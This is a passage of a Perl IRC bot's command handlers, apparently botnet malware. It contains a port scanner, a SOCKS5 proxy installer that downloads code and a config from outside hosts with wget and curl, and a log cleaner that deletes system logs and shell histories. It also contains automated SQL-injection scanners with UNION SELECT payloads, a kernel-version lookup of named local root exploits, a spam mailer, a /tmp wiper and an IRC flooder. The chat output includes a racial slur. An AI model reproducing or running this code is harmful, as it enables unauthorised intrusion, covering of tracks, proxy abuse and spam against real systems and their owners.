  913.  
  914. if ($scansock) {
  915.  
  916. push (@aberta, $porta);
  917.  
  918. $scansock->close;
  919.  
  920. }
  921.  
  922. }
  923.  
  924.  
  925.  
  926. if (@aberta) {
  927.  
  928. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Port-Scanner12] Open ports founded: @aberta");
  929.  
  930. } else {
  931.  
  932. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Port-Scanner12] No open ports foundend.");
  933.  
  934. }
  935.  
  936. }
  937.  
  938.  
  939.  
  940. ######################
  941. # End of Portscan #
  942.  
  943. #####################
  944.  
  945. #####################
  946.  
  947. # Chk The News from PacketStorm#
  948.  
  949. ######################
  950.  
  951. if ($funcarg =~ /^packetstorm/) {
  952.  
  953. my $c=0;
  954.  
  955. my $x;
  956.  
  957. my @ttt=();
  958.  
  959. my @ttt1=();
  960.  
  961. my $sock = IO::Socket::INET->new(PeerAddr=>"www.packetstormsecurity.org",PeerPort=>"80",Proto=>"tcp") or return;
  962.  
  963. print $sock "GET /whatsnew20.xml HTTP/1.0\r\n";
  964.  
  965. print $sock "Host: www.packetstormsecurity.org\r\n";
  966.  
  967. print $sock "Accept: */*\r\n";
  968.  
  969. print $sock "User-Agent: Mozilla/5.0\r\n\r\n";
  970.  
  971. my @r = <$sock>;
  972.  
  973. $page="@r";
  974.  
  975. close($sock);
  976.  
  977. while ($page =~ m/<link>(.*)<\/link>/g)
  978.  
  979. {
  980.  
  981. push(@ttt,$1);
  982.  
  983. }
  984.  
  985. while ($page =~ m/<description>(.*)<\/description>/g)
  986.  
  987. {
  988.  
  989. push(@ttt1,$1);
  990.  
  991. }
  992.  
  993. foreach $x (0..(@ttt - 1))
  994.  
  995. {
  996.  
  997. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3PacketStorm12] ".$ttt[$x]." ".$ttt1[$x]."");
  998.  
  999. sleep 3;
  1000.  
  1001. $c++;
  1002.  
  1003. }
  1004.  
  1005. }
  1006.  
  1007. ######################
  1008.  
  1009. #Auto Install Socks V5 using Mocks#
  1010.  
  1011. ######################
  1012.  
  1013. if ($funcarg =~ /^socks5/) {
  1014.  
  1015.  
  1016.  
  1017. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512]12 Installing Mocks please wait4");
  1018.  
  1019. system 'cd /tmp';
  1020.  
  1021. system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz';
  1022.  
  1023. system 'tar -xvfz mocks-0.0.2.tar.gz';
  1024.  
  1025. system 'rm -rf mocks-0.0.2.tar.gz';
  1026.  
  1027. system 'cd mocks-0.0.2';
  1028.  
  1029. system 'rm -rf mocks.conf';
  1030.  
  1031. system 'curl -O http://andromeda.covers.de/221/mocks.conf';
  1032.  
  1033. system 'touch mocks.log';
  1034.  
  1035. system 'chmod 0 mocks.log';
  1036.  
  1037. sleep(2);
  1038.  
  1039. system './mocks start';
  1040.  
  1041. sleep(4);
  1042.  
  1043. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512]12 Looks like its succesfully installed lets do the last things4 ");
  1044.  
  1045.  
  1046.  
  1047. #lets grab ip
  1048.  
  1049. $net = `/sbin/ifconfig | grep 'eth0'`;
  1050.  
  1051. if (length($net))
  1052.  
  1053. {
  1054.  
  1055. $net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
  1056.  
  1057. if (!length($net))
  1058.  
  1059. {
  1060.  
  1061. $net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
  1062.  
  1063. }
  1064.  
  1065. if (length($net))
  1066.  
  1067. {
  1068.  
  1069. chop($net);
  1070.  
  1071. @netip = split/:/,$net;
  1072.  
  1073. $netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
  1074.  
  1075. $ip = $1 .".". $2 .".". $3 .".". $4;
  1076.  
  1077.  
  1078.  
  1079. #and print it ^^
  1080.  
  1081. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512] Connect here :4 ". $ip .":8787 ");
  1082.  
  1083. }
  1084.  
  1085. else
  1086.  
  1087. {
  1088.  
  1089. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512] IP not founded ");
  1090.  
  1091. }
  1092.  
  1093. }
  1094.  
  1095. else
  1096.  
  1097. {
  1098.  
  1099. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512] ERROR WHILE INSTALLING MOCKS ");
  1100.  
  1101. }
  1102.  
  1103. }
  1104.  
  1105. ######################
  1106.  
  1107. # Nmap #
  1108.  
  1109. ######################
  1110.  
  1111. if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
  1112.  
  1113. my $hostip="$1";
  1114.  
  1115. my $portstart = "$2";
  1116.  
  1117. my $portend = "$3";
  1118.  
  1119. my (@abertas, %porta_banner);
  1120.  
  1121. sendraw($IRC_cur_socket, "PRIVMSG $printl : Nmap PortScan 12:. 4| 4: $1:. |.: 4Ports 12:. 4 $2-$3");
  1122.  
  1123. foreach my $porta ($portstart..$portend){
  1124.  
  1125. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  1126.  
  1127. if ($scansock) {
  1128.  
  1129. push (@abertas, $porta);
  1130.  
  1131. $scansock->close;
  1132.  
  1133. if ($xstats){
  1134.  
  1135. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Nmap12] Nmap PortScan :. |Founded 4 $porta"."/Open");
  1136.  
  1137. }
  1138.  
  1139. }
  1140.  
  1141. }
  1142.  
  1143. if (@abertas) {
  1144.  
  1145. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Nmap12] Nmap PortScan 12:. 4| Complete ");
  1146.  
  1147. } else {
  1148.  
  1149. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Nmap12] Nmap PortScan 12:. 4| No open ports have been founded 13");
  1150.  
  1151. }
  1152.  
  1153. }
  1154.  
  1155. ######################
  1156.  
  1157. # End of Nmap #
  1158.  
  1159. ######################
  1160.  
  1161. ######################
  1162.  
  1163. # Log Cleaner #
  1164.  
  1165. ######################
  1166.  
  1167. if ($funcarg =~ /^logcleaner/) {
  1168.  
  1169. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Log-Cleaner12] LogCleaner :. | Sorry our masters, nigga gotta big dick");
  1170.  
  1171. }
  1172.  
  1173. if ($funcarg =~ /^Cleandabitch/) {
  1174.  
  1175. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Log-Cleaner12] LogCleaner :. | This process can be long, just wait");
  1176.  
  1177. system 'rm -rf /var/log/lastlog';
  1178.  
  1179. system 'rm -rf /var/log/wtmp';
  1180.  
  1181. system 'rm -rf /etc/wtmp';
  1182.  
  1183. system 'rm -rf /var/run/utmp';
  1184.  
  1185. system 'rm -rf /etc/utmp';
  1186.  
  1187. system 'rm -rf /var/log';
  1188.  
  1189. system 'rm -rf /var/logs';
  1190.  
  1191. system 'rm -rf /var/adm';
  1192.  
  1193. system 'rm -rf /var/apache/log';
  1194.  
  1195. system 'rm -rf /var/apache/logs';
  1196.  
  1197. system 'rm -rf /usr/local/apache/log';
  1198.  
  1199. system 'rm -rf /usr/local/apache/logs';
  1200.  
  1201. system 'rm -rf /root/.bash_history';
  1202.  
  1203. system 'rm -rf /root/.ksh_history';
  1204.  
  1205. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Log-Cleaner12] LogCleaner :. | All default log and bash_history files erased");
  1206.  
  1207. sleep 1;
  1208.  
  1209. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Log-Cleaner12] LogCleaner :. | Now Erasing the rest of the machine log files");
  1210.  
  1211. system 'find / -name *.bash_history -exec rm -rf {} \;';
  1212.  
  1213. system 'find / -name *.bash_logout -exec rm -rf {} \;';
  1214.  
  1215. system 'find / -name "log*" -exec rm -rf {} \;';
  1216.  
  1217. system 'find / -name *.log -exec rm -rf {} \;';
  1218.  
  1219. sleep 1;
  1220.  
  1221. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Log-Cleaner12] LogCleaner :. | Done! All logs erased");
  1222.  
  1223. }
  1224.  
  1225. ######################
  1226.  
  1227. # End of Log Cleaner #
  1228.  
  1229. ######################
  1230.  
  1231. ######################
  1232.  
  1233. # SQL SCANNER #
  1234.  
  1235. ######################
  1236.  
  1237.  
  1238.  
  1239. if ($funcarg =~ /^sql2\s+(.*?)\s+(.*)\s+(\d+)/){
  1240.  
  1241. if (my $pid = fork) {
  1242.  
  1243. waitpid($pid, 0);
  1244.  
  1245. } else {
  1246.  
  1247. if (my $d=fork()) {
  1248.  
  1249. addproc($d,"[SQL2] $2");
  1250.  
  1251. exit;
  1252.  
  1253. } else {
  1254.  
  1255.  
  1256.  
  1257. my $bug=$1;
  1258.  
  1259. my $dork=$2;
  1260.  
  1261. my $contatore=0;
  1262.  
  1263. my ($type,$space);
  1264.  
  1265. my %hosts;
  1266.  
  1267. my $columns=$3;
  1268.  
  1269.  
  1270.  
  1271. ### Start Message
  1272.  
  1273. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SQL-Scanner12] Starting Scan for 4$bug $dork");
  1274.  
  1275. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SQL-Scanner12] Initializing on 45 12Search Engines ");
  1276.  
  1277. ### End of Start Message
  1278.  
  1279. # Starting Google
  1280.  
  1281. my @glist=&google($dork);
  1282.  
  1283. sendraw($IRC_cur_socket, "PRIVMSG $printl 7[4@3SQL-Scanner12] 2G4o8o2g3l4e 7[".scalar(@glist)."7] Sites");
  1284.  
  1285. my @mlist=&msn($dork);
  1286.  
  1287. my @asklist=&ask($dork);
  1288.  
  1289. my @allist=&alltheweb($dork);
  1290.  
  1291. my @aollist=&aol($dork);
  1292.  
  1293. my @lycos=&lycos($dork);
  1294.  
  1295. my @ylist=&yahoo($dork);
  1296.  
  1297. my @mzlist=&mozbot($dork);
  1298.  
  1299. my @mamalist&mamma($dork);
  1300.  
  1301. my @hlist=&hotbot($dork);
  1302.  
  1303. my @altlist=&altavista($dork);
  1304.  
  1305. my @slist=&search($dork);
  1306.  
  1307. my @ulist=&uol($dork);
  1308.  
  1309. my @fireball=&fireball($dork);
  1310.  
  1311. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 2G4o8o2g3l4e 7[".scalar(@glist)."7] Sites");
  1312.  
  1313. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 MSN 7[".scalar(@mlist)."7] Sites");
  1314.  
  1315. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 AllTheWeb 7[".scalar(@allist)."7] Sites");
  1316.  
  1317. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 Ask.com 7[".scalar(@asklist)."7] Sites");
  1318.  
  1319. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 AOL 7[".scalar(@aollist)."7] Sites");
  1320.  
  1321. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 Lycos 7[".scalar(@lycos)."7] Sites");
  1322.  
  1323. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 Yahoo! 7[".scalar(@ylist)."7] Sites");
  1324.  
  1325. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 MozBot 7[".scalar(@mzlist)."7] Sites");
  1326.  
  1327. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 Mama 7[".scalar(@mamalist)."7] Sites");
  1328.  
  1329. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 HotBot 7[".scalar(@hlist)."7] Sites");
  1330.  
  1331. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 Altavista 7[".scalar(@altlist)."7] Sites");
  1332.  
  1333. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 Search[dot]com 7[".scalar(@slist)."7] Sites");
  1334.  
  1335. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 UoL 7[".scalar(@ulist)."7] Sites");
  1336.  
  1337. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3SQL-Scanner12]12 FireBall 7[".scalar(@flist)."7] Sites");
  1338.  
  1339.  
  1340.  
  1341. push(my @tot, @glist, @mlist, @alist, @allist, @asklist, @aollist, @lycos, @ylist, @mzlist, @mamalist, @hlist,@altlist, @slist, @ulist, @flist );
  1342.  
  1343.  
  1344.  
  1345. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ scan ] [ 12Filtruje4 ][ ".scalar(@tot)." 12Stron4 ] ");
  1346.  
  1347. my @puliti=&unici(@tot);
  1348.  
  1349.  
  1350.  
  1351. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ SQL ] [ 12$dork4 ][ ".scalar(@puliti)." 12Stron4 ] ");
  1352.  
  1353.  
  1354.  
  1355. my $uni=scalar(@puliti);
  1356.  
  1357.  
  1358.  
  1359. foreach my $sito (@puliti) {
  1360.  
  1361.  
  1362.  
  1363. $contatore++;
  1364.  
  1365. if ($contatore %5==0){
  1366.  
  1367. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ scan ] [ 12Skanuje4 ][ ".$contatore." 12z4 ".$uni. " 12Stron4 ] ");
  1368.  
  1369. }
  1370.  
  1371. sleep 3;
  1372.  
  1373. if ($contatore==$uni-1){
  1374.  
  1375. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ scan ] [ 12Koniec:4 $bug $dork ] ");
  1376.  
  1377. }
  1378.  
  1379. sleep 3;
  1380.  
  1381. my $site="http://".$sito.$bug;
  1382.  
  1383. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ sql ] [ 12Sprawdzam: 4$site 12cols: 4 $columns ] ");
  1384.  
  1385.  
  1386.  
  1387. $w=int rand(999);
  1388.  
  1389. $w=$w*1000;
  1390.  
  1391. for($i=1;$i<=$columns;$i++) {
  1392.  
  1393. splice(@col,0,$#col+1);
  1394.  
  1395. for($j=1;$j<=$i;$j++) {
  1396.  
  1397. push(@col,$w+$j);
  1398.  
  1399. }
  1400.  
  1401. $tmp=join(",",@col);
  1402.  
  1403. $test=$site."-1+UNION+SELECT+".$tmp."/*";
  1404.  
  1405. print $test."\n";
  1406.  
  1407. $result=get_html($test);
  1408.  
  1409. $result =~ s/\/\*\*\///g;
  1410.  
  1411. $result =~ s/UNION([^(\*)]*)//g;
  1412.  
  1413. for($k=1;$k<=$i;$k++) {
  1414.  
  1415. $n=$w+$k;
  1416.  
  1417. if($result =~ /$n/){
  1418.  
  1419. splice(@col2,0,$#col2+1);
  1420.  
  1421. for($s=1;$s<=$i;$s++) {
  1422.  
  1423. push(@col2,$s);
  1424.  
  1425. }
  1426.  
  1427. $tmp2=join(",",@col2);
  1428.  
  1429. $test2="+UNION+SELECT+".$tmp2."/*";
  1430.  
  1431. push @{$dane{$test2}},$k;
  1432.  
  1433. }
  1434.  
  1435. }
  1436.  
  1437. }
  1438.  
  1439. for $klucz (keys %dane) {
  1440.  
  1441. foreach $i(@{$dane{$klucz}}) {
  1442.  
  1443. $klucz =~ s/$i/$i/;
  1444.  
  1445. }
  1446.  
  1447. sendraw($IRC_cur_socket, "PRIVMSG $printl :13,1 [ vuln ] 9,1 [ ".$site."-1".$klucz." ]  ");
  1448.  
  1449. }
  1450.  
  1451. %dane=();
  1452.  
  1453. }
  1454.  
  1455. }
  1456.  
  1457. delproc($$);
  1458.  
  1459. exit;
  1460.  
  1461. }
  1462.  
  1463. }
  1464.  
  1465. ####### SQL SCANNER #########
  1466.  
  1467.  
  1468.  
  1469. if ($funcarg =~ /^autoscan\s+(.*)\s+http\:\/\/(.*?)\/(.*?)\s+(\d+)/){
  1470.  
  1471. if (my $pid = fork) {
  1472.  
  1473. waitpid($pid, 0);
  1474.  
  1475. } else {
  1476.  
  1477. if (my $d=fork()) {
  1478.  
  1479. addproc($d,"[String] $2");
  1480.  
  1481. exit;
  1482.  
  1483. } else {
  1484.  
  1485. $kto = $1;
  1486.  
  1487. $host = $2;
  1488.  
  1489. $skrypt = $3;
  1490.  
  1491. $czekac=$4;
  1492.  
  1493.  
  1494.  
  1495. #http://ttl.ugu.pl/string/index.php
  1496.  
  1497. my $socke = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>"80",Proto=>"tcp") or return;
  1498.  
  1499. print $socke "GET /$skrypt HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  1500.  
  1501.  
  1502.  
  1503. my @r = <$socke>;
  1504.  
  1505. $page="@r";
  1506.  
  1507.  
  1508.  
  1509. $page =~ s/!scan(\s+)//g;
  1510.  
  1511. $page =~ s/!scan(.)//g;
  1512.  
  1513. $page =~ s/\<.*\>//g;
  1514.  
  1515.  
  1516.  
  1517. @lines = split (/\n/, $page);
  1518.  
  1519. $ile=scalar(@lines);
  1520.  
  1521.  
  1522.  
  1523.  
  1524.  
  1525. for($i=9;$i<=$ile;$i+=4) {
  1526.  
  1527.  
  1528.  
  1529. for($j=0;$j<4;$j++) {
  1530.  
  1531. #print $lines[$i+$j]."\n";
  1532.  
  1533.  
  1534.  
  1535. sendraw($IRC_cur_socket, "PRIVMSG $printl :$kto $lines[$i+$j]");
  1536.  
  1537.  
  1538.  
  1539. sleep 10;
  1540.  
  1541. }
  1542.  
  1543.  
  1544.  
  1545. sleep $czekac*60;
  1546.  
  1547. }
  1548.  
  1549.  
  1550.  
  1551. }
  1552.  
  1553. delproc($$);
  1554.  
  1555. exit;
  1556.  
  1557. }
  1558.  
  1559. }
  1560.  
  1561.  
  1562.  
  1563.  
  1564.  
  1565.  
  1566.  
  1567.  
  1568.  
  1569.  
  1570.  
  1571. ####### SQL SCANNER #########
  1572.  
  1573.  
  1574.  
  1575. if ($funcarg =~ /^sql\s+(.*)\s+(\d+)/){
  1576.  
  1577. if (my $pid = fork()) {
  1578.  
  1579. waitpid($pid, 0);
  1580.  
  1581. } else {
  1582.  
  1583. if (my $d=fork()) {
  1584.  
  1585. addproc($d,"[SQL1] $1 $2");
  1586.  
  1587. exit;
  1588.  
  1589. } else {
  1590.  
  1591. my $site=$1;
  1592.  
  1593. my $columns=$2;
  1594.  
  1595. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ sql ] [ 12Sprawdzam: 4$site 12cols: 4 $columns ] ");
  1596.  
  1597.  
  1598.  
  1599. $w=int rand(999);
  1600.  
  1601. $w=$w*1000;
  1602.  
  1603. for($i=1;$i<=$columns;$i++) {
  1604.  
  1605. splice(@col,0,$#col+1);
  1606.  
  1607. for($j=1;$j<=$i;$j++) {
  1608.  
  1609. push(@col,$w+$j);
  1610.  
  1611. }
  1612.  
  1613. $tmp=join(",",@col);
  1614.  
  1615. $test=$site.$bug."-1+UNION+SELECT+".$tmp."/*";
  1616.  
  1617. #$result=query($test);
  1618.  
  1619. $result=get_html($test);
  1620.  
  1621.  
  1622.  
  1623. $result =~ s/\/\*\*\///g;
  1624.  
  1625. $result =~ s/UNION([^(\*)]*)//g;
  1626.  
  1627. for($k=1;$k<=$i;$k++) {
  1628.  
  1629. $n=$w+$k;
  1630.  
  1631. if($result =~ /$n/){
  1632.  
  1633. splice(@col2,0,$#col2+1);
  1634.  
  1635. for($s=1;$s<=$i;$s++) {
  1636.  
  1637. push(@col2,$s);
  1638.  
  1639. }
  1640.  
  1641. $tmp2=join(",",@col2);
  1642.  
  1643. $test2="+UNION+SELECT+".$tmp2."/*";
  1644.  
  1645. push @{$dane{$test2}},$k;
  1646.  
  1647. }
  1648.  
  1649. }
  1650.  
  1651. }
  1652.  
  1653. for $klucz (keys %dane) {
  1654.  
  1655. foreach $i(@{$dane{$klucz}}) {
  1656.  
  1657. $klucz =~ s/$i/$i/;
  1658.  
  1659. }
  1660.  
  1661. sendraw($IRC_cur_socket, "PRIVMSG $printl :13,1 [ vuln ] 9,1 [ ".$site.$bug."-1".$klucz." ]  ");
  1662.  
  1663. }
  1664.  
  1665. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ sql ] [ 12Koniec 4 ] ");
  1666.  
  1667. }
  1668.  
  1669. delproc($$);
  1670.  
  1671. exit;
  1672.  
  1673. }
  1674.  
  1675. }
  1676.  
  1677. ####### SQL SCANNER #########
  1678.  
  1679. ######################
  1680.  
  1681. # Rootable #
  1682.  
  1683. ######################
  1684.  
  1685. if ($funcarg =~ /^rootable/) {
  1686.  
  1687. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Rootable12]::::... Nah tho ");
  1688.  
  1689. }
  1690.  
  1691. if ($funcarg =~ /^rootme/) {
  1692.  
  1693. my $khost = `uname -r`;
  1694.  
  1695. my $currentid = `whoami`;
  1696.  
  1697. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Rootable12] Currently you are ".$currentid." ");
  1698.  
  1699. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Rootable12] The kernel of this zr is ".$khost." ");
  1700.  
  1701. chomp($khost);
  1702.  
  1703.  
  1704.  
  1705. my %h;
  1706.  
  1707. $h{'w00t'} = {
  1708.  
  1709. vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20']
  1710.  
  1711. };
  1712.  
  1713.  
  1714.  
  1715. $h{'brk'} = {
  1716.  
  1717. vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
  1718.  
  1719. };
  1720.  
  1721.  
  1722.  
  1723. $h{'ave'} = {
  1724.  
  1725. vuln=>['2.4.19','2.4.20']
  1726.  
  1727. };
  1728.  
  1729.  
  1730.  
  1731. $h{'elflbl'} = {
  1732.  
  1733. vuln=>['2.4.29']
  1734.  
  1735. };
  1736.  
  1737.  
  1738.  
  1739. $h{'elfdump'} = {
  1740.  
  1741. vuln=>['2.4.27']
  1742.  
  1743. };
  1744.  
  1745.  
  1746.  
  1747. $h{'expand_stack'} = {
  1748.  
  1749. vuln=>['2.4.29']
  1750.  
  1751. };
  1752.  
  1753.  
  1754.  
  1755. $h{'h00lyshit'} = {
  1756.  
  1757. vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
  1758.  
  1759. };
  1760.  
  1761.  
  1762.  
  1763. $h{'kdump'} = {
  1764.  
  1765. vuln=>['2.6.13']
  1766.  
  1767. };
  1768.  
  1769.  
  1770.  
  1771. $h{'km2'} = {
  1772.  
  1773. vuln=>['2.4.18','2.4.22']
  1774.  
  1775. };
  1776.  
  1777.  
  1778.  
  1779. $h{'krad'} = {
  1780.  
  1781. vuln=>['2.6.11']
  1782.  
  1783. };
  1784.  
  1785.  
  1786.  
  1787. $h{'krad3'} = {
  1788.  
  1789. vuln=>['2.6.11','2.6.9']
  1790.  
  1791. };
  1792.  
  1793.  
  1794.  
  1795. $h{'local26'} = {
  1796.  
  1797. vuln=>['2.6.13']
  1798.  
  1799. };
  1800.  
  1801.  
  1802.  
  1803. $h{'loko'} = {
  1804.  
  1805. vuln=>['2.4.22','2.4.23','2.4.24']
  1806.  
  1807. };
  1808.  
  1809.  
  1810.  
  1811. $h{'mremap_pte'} = {
  1812.  
  1813. vuln=>['2.4.20','2.2.25','2.4.24']
  1814.  
  1815. };
  1816.  
  1817.  
  1818.  
  1819. $h{'newlocal'} = {
  1820.  
  1821. vuln=>['2.4.17','2.4.19','2.4.18']
  1822.  
  1823. };
  1824.  
  1825.  
  1826.  
  1827. $h{'ong_bak'} = {
  1828.  
  1829. vuln=>['2.4.','2.6.']
  1830.  
  1831. };
  1832.  
  1833.  
  1834.  
  1835. $h{'ptrace'} = {
  1836.  
  1837. vuln=>['2.2.','2.4.22']
  1838.  
  1839. };
  1840.  
  1841.  
  1842.  
  1843. $h{'ptrace_kmod'} = {
  1844.  
  1845. vuln=>['2.4.2']
  1846.  
  1847. };
  1848.  
  1849.  
  1850.  
  1851. $h{'ptrace24'} = {
  1852.  
  1853. vuln=>['2.4.9']
  1854.  
  1855. };
  1856.  
  1857.  
  1858.  
  1859. $h{'pwned'} = {
  1860.  
  1861. vuln=>['2.4.','2.6.']
  1862.  
  1863. };
  1864.  
  1865.  
  1866.  
  1867. $h{'py2'} = {
  1868.  
  1869. vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
  1870.  
  1871. };
  1872.  
  1873.  
  1874.  
  1875. $h{'raptor_prctl'} = {
  1876.  
  1877. vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
  1878.  
  1879. };
  1880.  
  1881.  
  1882.  
  1883. $h{'prctl3'} = {
  1884.  
  1885. vuln=>['2.6.13','2.6.17','2.6.9']
  1886.  
  1887. };
  1888.  
  1889.  
  1890.  
  1891. $h{'remap'} = {
  1892.  
  1893. vuln=>['2.4.']
  1894.  
  1895. };
  1896.  
  1897.  
  1898.  
  1899. $h{'rip'} = {
  1900.  
  1901. vuln=>['2.2.']
  1902.  
  1903. };
  1904.  
  1905.  
  1906.  
  1907. $h{'stackgrow2'} = {
  1908.  
  1909. vuln=>['2.4.29','2.6.10']
  1910.  
  1911. };
  1912.  
  1913.  
  1914.  
  1915. $h{'uselib24'} = {
  1916.  
  1917. vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
  1918.  
  1919. };
  1920.  
  1921.  
  1922.  
  1923. $h{'newsmp'} = {
  1924.  
  1925. vuln=>['2.6.']
  1926.  
  1927. };
  1928.  
  1929.  
  1930.  
  1931. $h{'smpracer'} = {
  1932.  
  1933. vuln=>['2.4.29']
  1934.  
  1935. };
  1936.  
  1937.  
  1938.  
  1939. $h{'loginx'} = {
  1940.  
  1941. vuln=>['2.4.22']
  1942.  
  1943. };
  1944.  
  1945.  
  1946.  
  1947. $h{'exp.sh'} = {
  1948.  
  1949. vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
  1950.  
  1951. };
  1952.  
  1953.  
  1954.  
  1955. $h{'prctl'} = {
  1956.  
  1957. vuln=>['2.6.']
  1958.  
  1959. };
  1960.  
  1961.  
  1962.  
  1963. $h{'kmdx'} = {
  1964.  
  1965. vuln=>['2.6.','2.4.']
  1966.  
  1967. };
  1968.  
  1969.  
  1970.  
  1971. $h{'raptor'} = {
  1972.  
  1973. vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
  1974.  
  1975. };
  1976.  
  1977.  
  1978.  
  1979. $h{'raptor2'} = {
  1980.  
  1981. vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
  1982.  
  1983. };
  1984.  
  1985.  
  1986.  
  1987. foreach my $key(keys %h){
  1988.  
  1989. foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
  1990.  
  1991. if($khost=~/^$kernel/){
  1992.  
  1993. chop($kernel) if ($kernel=~/.$/);
  1994.  
  1995. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Rootable12] Possible Local Root Exploits: ". $key ." ");
  1996.  
  1997. }
  1998.  
  1999. }
  2000.  
  2001. }
  2002.  
  2003. }
  2004.  
  2005. ######################
  2006.  
  2007. # MAILER #
  2008.  
  2009. ######################
  2010. my @botinfo=("LastMalware", "W1CK", "Redlive13", "BekUPE");
  2011.  
  2012. if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
  2013.  
  2014. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Mailer12] Mailer :. | Sending Mail to : 2 $3");
  2015.  
  2016. $subject = $1;
  2017.  
  2018. $sender = $2;
  2019.  
  2020. $recipient = $3;
  2021.  
  2022. @corpo = $4;
  2023.  
  2024. $mailtype = "content-type: text/html";
  2025.  
  2026. $sendmail = '/usr/sbin/sendmail';
  2027.  
  2028. open (SENDMAIL, "| $sendmail -t");
  2029.  
  2030. print SENDMAIL "$mailtype\n";
  2031.  
  2032. print SENDMAIL "Subject: $subject\n";
  2033.  
  2034. print SENDMAIL "From: $sender\n";
  2035.  
  2036. print SENDMAIL "To: $recipient\n\n";
  2037.  
  2038. print SENDMAIL "@corpo\n\n";
  2039.  
  2040. close (SENDMAIL);
  2041.  
  2042. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Mailer12] Mailer :. | Mail Sent To : 2 $recipient");
  2043.  
  2044. }
  2045.  
  2046. ######################
  2047.  
  2048. # End of MAILER #
  2049.  
  2050. ######################
  2051.  
  2052. # A /tmp cleaner
  2053.  
  2054.  
  2055.  
  2056. if ($funcarg =~ /^cleartmp/) {
  2057.  
  2058. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3TMPCleaner12] /tmp is Cleaned");
  2059.  
  2060. }
  2061.  
  2062. if ($funcarg =~ /^no/) {
  2063.  
  2064. system 'cd /tmp;rm -rf *';
  2065.  
  2066. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3TMPCleaner12] /tmp is Cleaned");
  2067.  
  2068. }
  2069.  
  2070. #-#-#-#-#-#-#-#-#
  2071.  
  2072. # Flooders IRC #
  2073.  
  2074. #-#-#-#-#-#-#-#-#
  2075.  
  2076. # msg, @msgflood <who>
  2077.  
  2078. if ($funcarg =~ /^msgflood (.+?) (.*)/) {
  2079.  
  2080. for($i=0; $i<=10; $i+=1){
  2081.  
  2082. sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2);
  2083.  
  2084. }
  2085.  
